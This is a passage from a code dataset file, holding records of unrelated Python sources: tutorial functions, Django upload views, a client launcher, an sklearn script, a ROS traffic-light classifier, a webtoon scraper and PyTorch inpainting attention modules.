2))\n\nprint(math.sqrt(2))\n\n\n# process ax**2 + bx + c = 0\ndef quadratic(a, b, c):\n    if not (isinstance(a, (int, float)) and isinstance(b, (int, float)) and isinstance(c, (float, int))):\n        raise TypeError('Bad Operand Type')\n    else:\n        d = b ** 2 - 4 * a * c\n        if d > 0:\n            x1 = (-b + math.sqrt(d)) / (2 * a)\n            x2 = (-b - math.sqrt(d)) / (2 * a)\n            return 'Two distinct roots: x1 = %.2f, x2 = %.2f' % (x1, x2)\n        elif d == 0:\n            return 'Two equal roots: x1 = x2 = %.2f' % (-b / (2 * a))\n        else:\n            return 'No real roots'\n\nprint(quadratic(1, 5, 1))\nprint(quadratic(1, 2, 3))\nprint(quadratic(1, 4, 4))\n# print(quadratic(1, 4, '4'))\n\n# Positional parameters\n# def power(x):\n#     return x * x\n# print(power(9))\n\n\n# Default parameters\ndef power(x, n=2):\n    s = 1\n    while n > 0:\n        n = n - 1\n        s = s * x\n    return s\n\nprint(power(9, 3))\nprint(power(9))\n\n\ndef enroll(name, gender, age=18, city='Shanghai'):\n    print('name:', 
name)\n    print('gender:', gender)\n    print('age:', age)\n    print('city:', city)\n\nenroll('Tia', 'F')\nenroll('Ezreal', 'M', 25, 'Zhejiang')\n\n\ndef add_end(l=[]):\n    l.append('END')\n    return l\n\nprint(add_end())\nprint(add_end())\n\n\ndef add_end(l=None):\n    if l is None:\n        l = []\n    l.append('END')\n    return l\n\nprint(add_end())\nprint(add_end())\nprint(add_end(['a', 'b']))\n\n# def calc(numbers):\n#     sum = 0\n#     for n in numbers:\n#         sum = sum + n * n\n#     return sum\n#\n# print(calc([1, 3, 5, 7]))\n\n\n# Variable arguments\ndef calc(*numbers):\n    sum = 0\n    for n in numbers:\n        sum = sum + n * n\n    return sum\n\nprint(calc(1, 3, 5, 7))\nnums = [1, 3, 5, 7]\nprint(calc(*nums))\nprint(calc(nums[0], nums[1], nums[2], nums[3]))\n\n\n# Keyword arguments\ndef person(name, age, **kw):\n    if 'city' in kw:\n        pass\n    if 'job' in kw:\n        pass\n    print('name:', name, 'age:', age, 'other:', kw)\n\nperson('Tia', 18, weight=100)\nperson('Adam', 45, gender='M', job='Engineer')\nextra = {'city': 'Beijing', 'job': 'Engineer'}\nperson('Jack', 24, city=extra['city'], job=extra['job'])\nperson('Jack', 24, **extra)\n\n\n# Named keyword arguments\ndef person2(name, age, *, city, job):\n    print(name, age, city, job)\n\nperson2('Suki', 25, city='Beijing', job='Engineer')\n\n\ndef person3(name, age, *args, city='Beijing', job):\n    print(name, age, args, city, job)\n\nperson3('Suki', 25, 'sports', city='Shanghai', job='Q')\n\n\n# Combining parameter kinds: they must be declared in this order: required, default, variable, named keyword, and keyword arguments\ndef f1(a, b, c=0, *args, **kw):\n    print('a =', a, 'b =', b, 'c =', c, 'args =', args, 'kw =', kw)\n\n\ndef f2(a, b, c=0, *, d, **kw):\n    print('a =', a, 'b =', b, 'c =', c, 'd =', d, 'kw =', kw)\n\nf1(1, 2)\nf1(1, 2, c=3)\nf1(1, 2, 3, 'a', 'b')\nf1(1, 2, 3, 'a', 'b', x=99)\nf2(1, 2, d=99, ext=None)\n\nargs = (1, 2, 3, 4)\nkw = {'d': 99, 'x': '#'}\nf1(*args, **kw)\nargs = (1, 2, 3)\nkw = {'d': 88, 'x': '#'}\nf2(*args, **kw)\n\n\n# recursion\ndef fact(n):\n    if n == 1:\n        return 1\n    return n * fact(n - 1)\n\nprint(fact(9))\nprint(fact(10))\n\n\n# Hanoi\ndef move(n, a, b, c):\n    if n == 1:\n        print('%s -> %s' % (a, c))\n    else:\n        move(n - 1, a, c, b)\n        print('%s -> %s' % (a, c))\n        move(n - 1, b, a, c)\n\nmove(3, 'A', 'B', 'C')\nmove(5, 'Tia', 'Suki', 'Ella')\n","sub_path":"learnPython/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"347305037","text":"# -*- coding: utf8 -*- \nfrom django.http import HttpResponse\nfrom django.shortcuts import render,render_to_response\nimport json\nfrom django import forms\nfrom django.core.files.base import ContentFile \nfrom django.views.decorators.csrf import csrf_exempt\nimport time\nimport os\nfrom register.models import *\nfrom register.form import *\n@csrf_exempt\ndef getUpId(request):\n\ttry:\n\t\tif request.method == 'POST':\n\t\t\tpost = request.POST\n\t\t\ttask = Task()\n\t\t\ttask.createTime = post['createTime']\n\t\t\ttask.save()\n\t\t\treturn HttpResponse(Form(0,task.id))\n\texcept:\n\t\treturn HttpResponse(Form(1,\"\"))\n\n@csrf_exempt\ndef upJar(request):\n\ttry:\n\t\tif request.method == 'POST':\n\t\t\tpost = request.POST\n\t\t\tNumber = post['number']\n\t\t\tuser = User.objects.get(number = Number)\n\t\t\tjarfile = request.FILES.get(\"jarfile\")\n\t\t\ttask = Task.objects.get(id = post['id'])\n\t\t\ttask.user = user\n\t\t\taddJar(jarfile,task,post['id'])\n\t\t\ttask.save()\n\t\t\treturn HttpResponse(Form(0,task.id))\n\texcept:\n\t\treturn HttpResponse(Form(1,\"\"))\n\n\n@csrf_exempt\ndef upInData(request):\n\ttry:\n\t\tif 
request.method == 'POST':\n\t\t\tpost = request.POST\n\t\t\tNumber = post['number']\n\t\t\tuser = User.objects.get(number = Number)\n\t\t\tinfile = request.FILES.get(\"infile\")\n\t\t\t# jarfile = request.FILES.get(\"jarfile\")\n\t\t\ttask = Task.objects.get(id = post['id'])\n\t\t\ttask.user = user\n\t\t\t# addJar(jarfile,task)\n\t\t\taddInData(infile,task)\n\t\t\ttask.save()\n\t\t\treturn HttpResponse(Form(0,task.id))\n\texcept:\n\t\treturn HttpResponse(Form(1,\"\"))\n\n\n\n\n@csrf_exempt\ndef addJar(file , task ,id):\n\tfile_name = ''\n\ttry:\n\t\tpath = Path + 'media/addJar/'\n\t\tif not os.path.exists(path):\n\t\t\tos.mkdir(path)\n\t\tfn = time.strftime(\"%Y%m%d%H%M%S\")\n\t\tfile_name = path + str(id) + '.jar'\n\t\tdestination = open(file_name,'wb')\n\t\tfor chunk in file.chunks():\n\t\t\tdestination.write(chunk)\n\t\tdestination.close()\n\t\ttask.jar = Url + file_name\n\texcept:\n\t\tpass\n@csrf_exempt\ndef addInData(file,task):\n\tfile_name = ''\n\ttry:\n\t\tpath = Path+'media/addInData/'\n\t\tif not os.path.exists(path):\n\t\t\tos.mkdir(path)\n\t\tfn = time.strftime(\"%Y%m%d%H%M%S\")\n\t\tfile_name = path + str(task.user.number) + '.in'\n\t\tdestination = open(file_name,'wb')\n\t\tfor chunk in file.chunks():\n\t\t\tdestination.write(chunk)\n\t\tdestination.close()\n\t\ttask.indata = Url + file_name\n\texcept:\n\t\tpass","sub_path":"achieveTask/upTask.py","file_name":"upTask.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"438023498","text":"# stdlib\nimport argparse\nimport logging\nimport logging.config\nimport signal\nimport sys\nimport os\n\n# third party lib\nimport requests\n\n# Internal lib\nfrom client.lib import shared\nfrom lib import settings\nimport worker\nfrom worker import factory\nfrom lib.logging_config import return_client_config\n\n# Routes\n\nserver_host = settings.ServerHTTP.external_host\nserver_port = settings.ServerHTTP.port\n\n\nclass BaseURL(object):\n __instance = None\n\n @staticmethod\n def get_instance(is_dev_env):\n if BaseURL.__instance is None:\n BaseURL(is_dev_env)\n return BaseURL.__instance\n\n def __init__(self, is_dev_env):\n if BaseURL.__instance is not None:\n return # Short circuit instantiation\n if is_dev_env:\n self.url = f'http://{server_host}:{server_port}/api'\n else:\n self.url = f'https://{server_host}:{server_port}/api'\n BaseURL.__instance = self\n\n\ndef parse_args():\n client_names = list(map(lambda x: x['name'], settings.ClientHTTP.clients))\n\n parser = argparse.ArgumentParser(description='CWS client')\n parser.add_argument('--name',\n type=str,\n help='Name of the client to start.',\n choices=client_names,\n required=True)\n \"\"\"\n The plinkfile is not of type argparse.FileType, as the base name won't exist\n\n e.g. popres1 is what we use to get popres1.[ind, bim, bam, fam], but popres1 doesn't exist.\n \"\"\"\n parser.add_argument('--plinkfile',\n type=str,\n help='The plinkfile to analyze',\n required=True)\n parser.add_argument('--port', type=int, help='[OPTIONAL] Override the default port')\n parser.add_argument('--external_host', type=str, help='[OPTIONAL] Override the default host used by '\n 'external systems to access this client. 
Defaults to '\n f'{settings.ClientHTTP.default_external_host}')\n parser.add_argument('--max_len', type=int, help='[OPTIONAL] Maximum content length for a given request.'\n f'Defaults to {settings.ClientHTTP.default_max_content_length} b')\n parser.add_argument('--listen_host', type=str, help='[OPTIONAL] Override the default host on which this client'\n 'should listen. Defaults to '\n f'{settings.ClientHTTP.default_listen_host}')\n parser.add_argument('--dev', type=bool, default=False, help='[OPTIONAL] Specify a development environment. '\n 'WARNING: this will bypass security checks.')\n\n return parser.parse_args()\n\n\ndef setup_logging(client_name):\n # Sorry in advance - the below mixes two different mini formats!\n fmt = f'[%(levelname)-5.5s] %(asctime)s [{client_name:10}] %(message)s'\n logging.basicConfig(level=logging.INFO, format=fmt, style='%')\n err_fmt = f'[%(levelname)-5.5s] %(asctime)s [{client_name:10}] %(pathname)-100.100s :: %(lineno)s => %(message)s'\n logging.basicConfig(level=logging.ERROR, format=err_fmt, style='%')\n\n\ndef configure_client(client, args):\n if args.external_host is not None:\n client['external_host'] = args.external_host\n if args.port is not None:\n client['port'] = args.port\n if args.listen_host is not None:\n client['listen_host'] = args.listen_host\n if args.max_len is not None:\n client['max_content_length'] = args.max_len\n if args.dev:\n client['ENV'] = 'development'\n os.environ[\"FLASK_ENV\"] = \"development\"\n client['plinkfile'] = args.plinkfile\n shared.set_plinkfile(args.plinkfile)\n\n return client\n\n\ndef register_self(client, server_url):\n url = f'{server_url}/clients'\n logging.info(f\"Server url: {url}\")\n try:\n registered_clients = requests.get(url).json()\n self_name = client['name']\n except Exception as e:\n logging.error('Error getting list of registered clients from server')\n logging.error(e)\n return False\n try:\n # Already registered, no need to register again\n next(filter(lambda x: x['name'] == self_name, registered_clients['msg']))\n logging.info('Already registered with server, not attempting to register again.')\n except StopIteration:\n # Not registered\n requests.post(url, json=client)\n logging.info('Successfully registered self with server')\n except Exception as e:\n logging.error(e)\n return False\n return True\n\n\ndef teardown(signum, frame, app):\n try:\n client = app.config['client']\n base_url = BaseURL.get_instance(None).url # Should always be initialised when we get here; passing None is OK\n url = f'{base_url}/clients/{client[\"name\"]}'\n requests.delete(url)\n sys.exit(0)\n except Exception as e:\n logging.error('Ran into unexpected error during teardown')\n logging.error(e)\n sys.exit(1)\n\n\ndef main():\n args = parse_args()\n client = next(filter(lambda x: x['name'] == args.name, settings.ClientHTTP.clients))\n logging_config = return_client_config(args.name+\".log\")\n logging.config.dictConfig(logging_config)\n\n app = factory.create_app(celery=worker.celery)\n app.config.update(\n CELERY_BROKER_URL='redis://localhost:6379',\n CELERY_RESULT_BACKEND='redis://localhost:6379'\n )\n\n # Overrides\n client = configure_client(client, args)\n\n app.config['MAX_CONTENT_LENGTH'] = client['max_content_length']\n app.config['client'] = client # Store configuration for later use\n if args.dev:\n app.config['ENV'] = 'development'\n\n # Handle a teardown on sigint/sigterm\n def _teardown(signum, frame):\n teardown(signum, frame, app)\n signal.signal(signal.SIGINT, _teardown)\n signal.signal(signal.SIGTERM, 
_teardown)\n\n server_url = BaseURL.get_instance(args.dev).url\n if not register_self(client, server_url):\n logging.error('Could not register self with server, exiting...')\n sys.exit(1)\n\n app.run(host=client['listen_host'], port=client['port'], threaded=False)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/client/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":6363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"109408149","text":"from lexical.common.vocabulary import *\nfrom lexical.common.word_breaker import *\n\nclass Document:\n\n def __init__(self, lang='english'):\n self.vocabulary = Vocabulary()\n self.word_breaker = WordBreaker(lang)\n\n self.raw_words = []\n self.raw_sentences = []\n\n def load_data(self, filename, delim='\\n'):\n\n # load file\n f = open(filename, 'r', encoding='utf-8').read()\n\n # split whole document\n sentences = f.split(delim)\n\n # split each sentence\n for sentence in sentences:\n raw_words = self.word_breaker.get_words(sentence)\n for raw_word in raw_words:\n self.raw_words.append(raw_word)\n\n self.raw_sentences.append(raw_words)\n\n # build vocabulary\n self.vocabulary.load_sentences(self.raw_sentences)\n\n def load_sentences(self, sentences):\n self.vocabulary.load_sentences(sentences)\n\n def load_words(self, words):\n self.vocabulary.load_words(words)\n\n def get_words(self):\n \"\"\"\n Get original words\n\n :return:\n \"\"\"\n\n return self.raw_words\n\n def get_ids(self):\n \"\"\"\n Get word ids\n\n :return:\n \"\"\"\n\n ids = []\n for word in self.raw_words:\n word_id = self.vocabulary.get_id(word)\n ids.append(word_id)\n\n return ids\n\nif __name__ == '__main__':\n\n doc = Document()\n doc.load_data('../../corpus_toy/english/document/ptb/ptb.train.txt')\n\n for word_id in doc.get_ids()[:100]:\n print(doc.vocabulary.get_word(word_id), word_id)\n","sub_path":"nlp/lexical/common/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"319437996","text":"from sklearn.neighbors import KNeighborsClassifier\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import LabelEncoder\r\nimport numpy as np\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score, classification_report, confusion_matrix\r\n\r\ndata = pd.read_csv(\"data_input/winner_45.csv\")\r\ntest = pd.read_csv(\"data_input/real.csv\")\r\ndata.drop(data.index[len(data) - 1], inplace=True)\r\ndata.drop(data.index[len(data) - 1], inplace=True)\r\n\r\nsvc = 0\r\nknc = 0\r\nk = 0\r\n\r\nX = data.drop(['g_next_serve', 'fav', 'winner', 'of_q', 'fo_q'], axis=1)\r\nY = np.array(data['winner'])\r\n# X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0)\r\nXT = test.drop(['g_next_serve', 'fav', 'winner', 'of_q', 'fo_q'], axis=1)\r\nYT = np.array(test['winner'])\r\n\r\n\r\nneigh = KNeighborsClassifier(n_neighbors=1)\r\nneigh.fit(X, Y)\r\n\r\nclf = SVC(gamma='auto')\r\nclf.fit(X, Y)\r\n\r\n\r\n# y_pred = clf.predict(XT)\r\n# y_pred = neigh.predict(XT)\r\ndata = pd.DataFrame()\r\ndata['svc'] = clf.predict(XT)\r\ndata['neigh'] = neigh.predict(XT)\r\ndata['ans'] = 
YT\r\nprint(data)\r\n\r\n\r\n","sub_path":"real_winner.py","file_name":"real_winner.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"109741855","text":"import rospy\nfrom styx_msgs.msg import TrafficLight\nimport tensorflow as tf\nimport cv2\nimport os\nfrom model import Model, image_width, image_height\nfrom keras.preprocessing.image import img_to_array\nimport numpy as np\nimport scipy\n\nclass TLClassifier(object):\n    def __init__(self):\n        \n        # Counters for writing images\n        self.red_image_number = 0\n        self.yellow_image_number = 0\n        self.green_image_number = 0\n        self.unknown_image_number = 0\n\n        self.model = Model()\n        self.model.load_weights(\"light_classification/model.h5\")\n        self.graph = tf.get_default_graph()\n\n\n    def get_classification(self, image, traffic_light_state_truth):\n        \"\"\"Determines the color of the traffic light in the image\n\n        Args:\n            image (cv::Mat): image containing the traffic light\n\n        Returns:\n            int: ID of traffic light color (specified in styx_msgs/TrafficLight)\n\n        \"\"\"\n        \n        # Time to run the network?\n        INFERENCE = True\n        if INFERENCE:\n            image = scipy.misc.imresize(image, (image_height, image_width))\n            image = img_to_array(image)\n            image /= 255.0\n            image = np.expand_dims(image, axis=0)\n            with self.graph.as_default():\n                preds = self.model.predict(image)[0]\n                #print(preds)\n                prediction = np.argmax(preds)\n                #rospy.loginfo(\"Model says: \" + str(prediction))\n                if prediction == 0: return TrafficLight.RED\n                if prediction == 1: return TrafficLight.YELLOW\n                if prediction == 2: return TrafficLight.GREEN\n                return TrafficLight.UNKNOWN\n\n        # Save training data\n        else:\n            try:\n                os.makedirs(\"new/red/\")\n                os.makedirs(\"new/yellow/\")\n                os.makedirs(\"new/green/\")\n                os.makedirs(\"new/none/\")\n            except:\n                pass\n            if traffic_light_state_truth == TrafficLight.RED:\n                self.red_image_number += 1\n                cv2.imwrite(\"new/red/image_\" + str(self.red_image_number) + \".png\", image)\n\n            if traffic_light_state_truth == TrafficLight.YELLOW:\n                self.yellow_image_number += 1\n                cv2.imwrite(\"new/yellow/image_\" + str(self.yellow_image_number) + \".png\", image)\n            \n            if traffic_light_state_truth == TrafficLight.GREEN:\n                self.green_image_number += 1\n                cv2.imwrite(\"new/green/image_\" + str(self.green_image_number) + \".png\", image)\n            \n            if traffic_light_state_truth == TrafficLight.UNKNOWN:\n                self.unknown_image_number += 1\n                cv2.imwrite(\"new/none/image_\" + str(self.unknown_image_number) + \".png\", image)\n            \n            # Save\n            return TrafficLight.UNKNOWN\n        \n","sub_path":"ros/src/tl_detector/light_classification/tl_classifier.py","file_name":"tl_classifier.py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"444749661","text":"from bs4 import BeautifulSoup #parse the html into a structured tree\nfrom urllib.request import urlopen #fetch the html for a given url\n\nif __name__ == '__main__':\n    #Naver Webtoon > fetch the episode titles of 신의 탑 (Tower of God)\n    # data = urlopen(\"https://comic.naver.com/webtoon/list.nhn?titleId=183559\")\n    data = urlopen(\"https://comic.naver.com/webtoon/list.nhn?titleId=651673\") #유미의 세포들 (Yumi's Cells)\n    soup = BeautifulSoup(data,\"lxml\")\n    #print(soup)\n\n    cartoon_titles = soup.find_all(\"td\",attrs={'class' : 'title'}) #<td class = \"title\">\n    html = \"\" #utf-8\n    for title in cartoon_titles:\n        t = title.find('a').text #get the episode title\n        link = title.find('a').get(\"href\")\n        link = \"http://comic.naver.com/\" + link\n        # print(link)\n        # print(\"<a href=\"+link+\">\"+t+\"</a>\")\n        
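# append one anchor per episode: the title linked to its page\n        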
html+=\"\"+t+\"

\"\n html += \"\"\n outputSoup = BeautifulSoup(html, \"lxml\") #htmlstring -> BeautifulSoup 객체\n prettyhtml = str(outputSoup.prettify()) #html 줄 예쁘게\n with open(\"유미의세포들.html\",\"w\",encoding=\"utf-8\") as f:\n f.write(prettyhtml)\n\n\n #다음 웹툰 > 어쩌다 발견한 7월 제목 가져오자\n # data = urlopen(\"http://webtoon.daum.net/webtoon/view/findjuly\") #url -> httpResponse객체\n # soup = BeautifulSoup(data,\"lxml\")\n # #print(soup)\n #\n # cartoon_titles = soup.find_all(\"strong\", attrs={'class' : 'tit_wt'})\n # for title in cartoon_titles:\n # print(title)","sub_path":"IX.프로젝트/web_crawling.py","file_name":"web_crawling.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"23492817","text":"\"\"\"\nnetwork.py (13-12-20)\nhttps://github.com/styler00dollar/Colab-Global-and-Local-Inpainting/blob/master/model/network.py\n\nAttention.py (13-12-20)\nhttps://github.com/styler00dollar/Colab-Global-and-Local-Inpainting/blob/master/model/Attention.py\n\ntools.py (13-12-20)\nhttps://github.com/styler00dollar/Colab-Global-and-Local-Inpainting/blob/master/utils/tools.py\n\"\"\"\nimport os\nimport torch\nimport yaml\nimport numpy as np\n#from PIL import Image\n\nimport torch.nn.functional as F\nimport cv2\n\n# Change the values of tensor x from range [0, 1] to [-1, 1]\ndef normalize(x):\n return x.mul_(2).add_(-1)\n\ndef same_padding(images, ksizes, strides, rates):\n assert len(images.size()) == 4\n batch_size, channel, rows, cols = images.size()\n out_rows = (rows + strides[0] - 1) // strides[0]\n out_cols = (cols + strides[1] - 1) // strides[1]\n effective_k_row = (ksizes[0] - 1) * rates[0] + 1\n effective_k_col = (ksizes[1] - 1) * rates[1] + 1\n padding_rows = max(0, (out_rows-1)*strides[0]+effective_k_row-rows)\n padding_cols = max(0, (out_cols-1)*strides[1]+effective_k_col-cols)\n # Pad the input\n padding_top = int(padding_rows / 2.)\n padding_left = int(padding_cols / 2.)\n padding_bottom = padding_rows - padding_top\n padding_right = padding_cols - padding_left\n paddings = (padding_left, padding_right, padding_top, padding_bottom)\n images = torch.nn.ZeroPad2d(paddings)(images)\n return images\n\n\ndef extract_image_patches(images, ksizes, strides, rates, padding='same'):\n \"\"\"\n Extract patches from images and put them in the C output dimension.\n :param padding:\n :param images: [batch, channels, in_rows, in_cols]. A 4-D Tensor with shape\n :param ksizes: [ksize_rows, ksize_cols]. 
The size of the sliding window for\n each dimension of images\n :param strides: [stride_rows, stride_cols]\n :param rates: [dilation_rows, dilation_cols]\n :return: A Tensor\n \"\"\"\n assert len(images.size()) == 4\n assert padding in ['same', 'valid']\n batch_size, channel, height, width = images.size()\n\n if padding == 'same':\n images = same_padding(images, ksizes, strides, rates)\n elif padding == 'valid':\n pass\n else:\n raise NotImplementedError('Unsupported padding type: {}.\\\n Only \"same\" or \"valid\" are supported.'.format(padding))\n\n unfold = torch.nn.Unfold(kernel_size=ksizes,\n dilation=rates,\n padding=0,\n stride=strides)\n patches = unfold(images)\n return patches # [N, C*k*k, L], L is the total number of such blocks\n\n\ndef local_patch(x, bbox_list):\n assert len(x.size()) == 4\n patches = []\n for i, bbox in enumerate(bbox_list):\n t, l, h, w = bbox\n patches.append(x[i, :, t:t + h, l:l + w])\n return torch.stack(patches, dim=0)\n\n\ndef reduce_mean(x, axis=None, keepdim=False):\n if not axis:\n axis = range(len(x.shape))\n for i in sorted(axis, reverse=True):\n x = torch.mean(x, dim=i, keepdim=keepdim)\n return x\n\n\ndef reduce_std(x, axis=None, keepdim=False):\n if not axis:\n axis = range(len(x.shape))\n for i in sorted(axis, reverse=True):\n x = torch.std(x, dim=i, keepdim=keepdim)\n return x\n\n\ndef reduce_sum(x, axis=None, keepdim=False):\n if not axis:\n axis = range(len(x.shape))\n for i in sorted(axis, reverse=True):\n x = torch.sum(x, dim=i, keepdim=keepdim)\n return x\n\ndef deprocess(img):\n img = img.add_(1).div_(2)\n return img\n\n\n# get configs\ndef get_config(config):\n with open(config, 'r') as stream:\n return yaml.load(stream)\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n#from utils.tools import *\n\n# Contextual attention implementation is borrowed from IJCAI 2019 : \"MUSICAL: Multi-Scale Image Contextual Attention Learning for Inpainting\".\n# Original implementation causes bad results for Pytorch 1.2+.\nclass GlobalLocalAttention(nn.Module):\n def __init__(self, in_dim, patch_size=3, propagate_size=3, stride=1):\n super(GlobalLocalAttention, self).__init__()\n self.patch_size = patch_size\n self.propagate_size = propagate_size\n self.stride = stride\n self.prop_kernels = None\n self.in_dim = in_dim\n self.feature_attention = GlobalAttention(in_dim)\n self.patch_attention = GlobalAttentionPatch(in_dim)\n\n def forward(self, foreground, mask, background=\"same\"):\n ###assume the masked area has value 1\n bz, nc, w, h = foreground.size()\n if background == \"same\":\n background = foreground.clone()\n mask = F.interpolate(mask, size=(h, w), mode='nearest')\n background = background * (1 - mask)\n foreground = self.feature_attention(foreground, background, mask)\n background = F.pad(background,\n [self.patch_size // 2, self.patch_size // 2, self.patch_size // 2, self.patch_size // 2])\n conv_kernels_all = background.unfold(2, self.patch_size, self.stride).unfold(3, self.patch_size,\n self.stride).contiguous().view(bz,\n nc,\n -1,\n self.patch_size,\n self.patch_size)\n\n mask_resized = mask.repeat(1, self.in_dim, 1, 1)\n mask_resized = F.pad(mask_resized,\n [self.patch_size // 2, self.patch_size // 2, self.patch_size // 2, self.patch_size // 2])\n mask_kernels_all = mask_resized.unfold(2, self.patch_size, self.stride).unfold(3, self.patch_size,\n self.stride).contiguous().view(\n bz,\n nc,\n -1,\n self.patch_size,\n self.patch_size)\n conv_kernels_all = conv_kernels_all.transpose(2, 1)\n mask_kernels_all = 
mask_kernels_all.transpose(2, 1)\n output_tensor = []\n for i in range(bz):\n feature_map = foreground[i:i + 1]\n\n # form convolutional kernels\n conv_kernels = conv_kernels_all[i] + 0.0000001\n mask_kernels = mask_kernels_all[i]\n conv_kernels = self.patch_attention(conv_kernels, conv_kernels, mask_kernels)\n norm_factor = torch.sum(conv_kernels ** 2, [1, 2, 3], keepdim=True) ** 0.5\n conv_kernels = conv_kernels / norm_factor\n\n conv_result = F.conv2d(feature_map, conv_kernels, padding=self.patch_size // 2)\n # print(conv_result.shape)\n if self.propagate_size != 1:\n if self.prop_kernels is None:\n self.prop_kernels = torch.ones([conv_result.size(1), 1, self.propagate_size, self.propagate_size])\n self.prop_kernels.requires_grad = False\n self.prop_kernels = self.prop_kernels.cuda()\n conv_result = F.conv2d(conv_result, self.prop_kernels, stride=1, padding=1, groups=conv_result.size(1))\n mm = (torch.mean(mask_kernels_all[i], dim=[1,2,3], keepdim=True)==0.0).to(torch.float32)\n mm = mm.permute(1,0,2,3).cuda()\n conv_result = conv_result * mm\n attention_scores = F.softmax(conv_result, dim=1)\n attention_scores = attention_scores * mm\n\n ##propagate the scores\n recovered_foreground = F.conv_transpose2d(attention_scores, conv_kernels, stride=1,\n padding=self.patch_size // 2)\n output_tensor.append(recovered_foreground)\n return torch.cat(output_tensor, dim=0)\n\n\nclass GlobalAttention(nn.Module):\n \"\"\" Self attention Layer\"\"\"\n\n def __init__(self, in_dim):\n super(GlobalAttention, self).__init__()\n self.chanel_in = in_dim\n\n self.query_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim, kernel_size=1)\n self.key_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim, kernel_size=1)\n self.value_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim, kernel_size=1)\n self.softmax = nn.Softmax(dim=-1) #\n self.rate = 1\n self.gamma = torch.tensor([1.0], requires_grad=True).cuda()\n\n def forward(self, a, b, c):\n m_batchsize, C, width, height = a.size() # B, C, H, W\n down_rate = int(c.size(2)//width)\n c = F.interpolate(c, scale_factor=1./down_rate*self.rate, mode='nearest')\n proj_query = self.query_conv(a).view(m_batchsize, -1, width * height).permute(0, 2, 1) # B, C, N -> B N C\n proj_key = self.key_conv(b).view(m_batchsize, -1, width * height) # B, C, N\n feature_similarity = torch.bmm(proj_query, proj_key) # B, N, N\n\n mask = c.view(m_batchsize, -1, width * height) # B, C, N\n mask = mask.repeat(1, height * width, 1).permute(0, 2, 1) # B, 1, H, W -> B, C, H, W // B\n\n feature_pruning = feature_similarity * mask\n attention = self.softmax(feature_pruning) # B, N, C\n feature_pruning = torch.bmm(self.value_conv(a).view(m_batchsize, -1, width * height),\n attention.permute(0, 2, 1)) # -. 
B, C, N\n out = feature_pruning.view(m_batchsize, C, width, height) # B, C, H, W\n out = a * c + self.gamma * (1.0 - c) * out\n return out\n\n\nclass GlobalAttentionPatch(nn.Module):\n \"\"\" Self attention Layer\"\"\"\n\n def __init__(self, in_dim):\n super(GlobalAttentionPatch, self).__init__()\n self.chanel_in = in_dim\n\n self.query_channel = nn.Conv2d(in_channels=in_dim, out_channels=in_dim, kernel_size=1)\n self.key_channel = nn.Conv2d(in_channels=in_dim, out_channels=in_dim, kernel_size=1)\n self.value_channel = nn.Conv2d(in_channels=in_dim, out_channels=in_dim, kernel_size=1)\n\n self.softmax_channel = nn.Softmax(dim=-1)\n self.gamma = torch.tensor([1.0], requires_grad=True).cuda()\n\n def forward(self, x, y, m):\n '''\n Something\n '''\n feature_size = list(x.size())\n # Channel attention\n query_channel = self.query_channel(x).view(feature_size[0], -1, feature_size[2] * feature_size[3])\n key_channel = self.key_channel(y).view(feature_size[0], -1, feature_size[2] * feature_size[3]).permute(0,\n 2,\n 1)\n channel_correlation = torch.bmm(query_channel, key_channel)\n m_r = m.view(feature_size[0], -1, feature_size[2]*feature_size[3])\n channel_correlation = torch.bmm(channel_correlation, m_r)\n energy_channel = self.softmax_channel(channel_correlation)\n value_channel = self.value_channel(x).view(feature_size[0], -1, feature_size[2] * feature_size[3])\n attented_channel = (energy_channel * value_channel).view(feature_size[0], feature_size[1],\n feature_size[2],\n feature_size[3])\n out = x * m + self.gamma * (1.0 - m) * attented_channel\n return out\n\n\nif __name__ == '__main__':\n x = torch.rand(3, 128, 64, 64, requires_grad=True).float().cuda()\n y = torch.rand(3, 1, 256, 256, requires_grad=False).float().cuda()\n y[y > 0.5] = 1\n y[y <= 0.5] = 0\n net = GlobalLocalAttention(128).cuda()\n out = net(x, y)\n print(out.shape)\n\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.utils import spectral_norm as spectral_norm_fn\nfrom torch.nn.utils import weight_norm as weight_norm_fn\n#from model.Attention import GlobalLocalAttention, GlobalAttention\n\n\nclass Generator(nn.Module):\n def __init__(self, input_dim=5, ngf=32, use_cuda=True, device_ids=[0]):\n super(Generator, self).__init__()\n self.input_dim = input_dim\n self.cnum = ngf\n self.use_cuda = use_cuda\n self.device_ids = device_ids\n\n self.coarse_generator = CoarseGenerator(self.input_dim, self.cnum, self.use_cuda, self.device_ids)\n self.fine_generator = FineGenerator(self.input_dim, self.cnum, self.use_cuda, self.device_ids)\n\n def forward(self, x, mask):\n x_stage1 = self.coarse_generator(x, mask)\n x_stage2 = self.fine_generator(x, x_stage1, mask)\n #return x_stage1, x_stage2\n #return x_stage2\n return x_stage2, x_stage1\n\n\nclass CoarseGenerator(nn.Module):\n def __init__(self, input_dim, cnum, use_cuda=True, device_ids=None):\n super(CoarseGenerator, 